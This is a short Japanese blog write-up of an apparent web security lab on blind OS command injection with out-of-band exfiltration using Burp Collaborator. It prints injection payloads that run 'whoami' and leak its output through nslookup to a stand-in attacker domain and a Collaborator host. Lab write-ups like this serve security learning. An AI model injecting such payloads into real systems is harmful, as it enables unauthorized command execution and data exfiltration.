Shikata Ga Nai

Private? There is no such things.

Blind OS command injection with out-of-band data exfiltrationをやってみた

Hello there, ('ω')ノ

 

帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。

whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。

例えば、下記のように。

 & nslookup `whoami`.kgji2ohoyw.web-attacker.com &

 

まずは、フィードバックを送信して。

 

f:id:ThisIsOne:20210318164709p:plain

 

該当するリクエストをリピータへ。

 

f:id:ThisIsOne:20210318164742p:plain

 

コラボレータのペイロードをコピーして。

 

f:id:ThisIsOne:20210318164909p:plain

 

下記をパラメータに追加してSendすると。

 ||nslookup+`whoami`.qqkzubmlegqqe32esgz5c089x03qrf.burpcollaborator.net||

 

f:id:ThisIsOne:20210318165942p:plain

 

ペイロードの結果として。

アプリケーションによって開始されたいくつかのDNS相互作用が表示されて。

コマンドからの出力がインタラクションのサブドメイン(下のエリア)に表示されて。

検索された完全なドメイン名は、Descriptionタブに表示されて。

 

f:id:ThisIsOne:20210318183911p:plain

 

検索されたドメイン名をDNS queryタブからコピーして。

 peter-I4mu2s

 

f:id:ThisIsOne:20210318170006p:plain

 

入力すると。

 

f:id:ThisIsOne:20210318165835p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210318165850p:plain

 

Best regards, (^^ゞ